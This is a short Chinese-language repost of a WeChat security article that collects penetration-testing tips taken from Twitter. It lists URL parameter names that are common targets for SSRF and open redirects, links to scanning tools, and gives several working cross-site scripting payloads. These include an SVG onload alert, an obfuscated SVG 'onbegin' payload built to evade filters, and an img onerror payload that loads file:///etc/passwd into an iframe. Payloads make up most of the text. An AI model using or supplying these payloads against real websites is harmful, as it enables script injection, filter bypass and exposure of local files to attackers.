干货 | Twitter渗透技巧搬运工(三)
2022-7-19 13:3:20 Author: HACK学习呀(查看原文) 阅读量:26 收藏

?host=?redirect=?uri=?path=?continue=?url=?window=?next=?data=?image-source=?n=?to=?follow=?u=?go=?fetch=?source=?img-src=

地址:https://github.com/projectdiscovery/interactsh

--><svg onload=alert(document.domain)>


地址:https://github.com/oppsec/Pinkerton

地址:https://github.com/oppsec/tomcter

<svg><set onbegin=d=document,b='`',d['loca'+'tion']='javascript&colon;aler'+'t'+b+domain+b>

练习地址:https://brutelogic.com.br/gym.php?p05=%3Csvg%3E%3Cset+onbegin=d=document,b=%27%60%27,d[%27loca%27%2B%27tion%27]=%27javascript%26colon;aler%27%2B%27t%27%2Bb%2Bdomain%2Bb%3E

<img src="xasdasdasd" onerror="document.write('<iframe src=file:///etc/passwd></iframe>')"/>

来源:https://twitter.com/ADITYASHENDE17/status/1541394832907796481?s=20&t=5MYsxyUlDopZzGIKAhSgWg

推荐阅读:

干货 | Twitter渗透技巧搬运工(一)

干货 | Twitter渗透技巧搬运工(二)

干货 | Twitter渗透技巧搬运工(三)

干货 | Github安全搬运工 2022年第十五期

实战 | WAF-Bypass之SQL注入绕过思路总结

点赞,转发,在看

由HACK学习编辑整理,如需转载请注明来源HACK学习


文章来源: http://mp.weixin.qq.com/s?__biz=MzI5MDU1NDk2MA==&mid=2247506645&idx=1&sn=c1c62a25c59db49765d64fd66d6b7ae1&chksm=ec1c8feadb6b06fc144c3c691070ce461319872325aef17ca0050f1d774479f89720fa40c19b#rd
如有侵权请联系:admin#unsafe.sh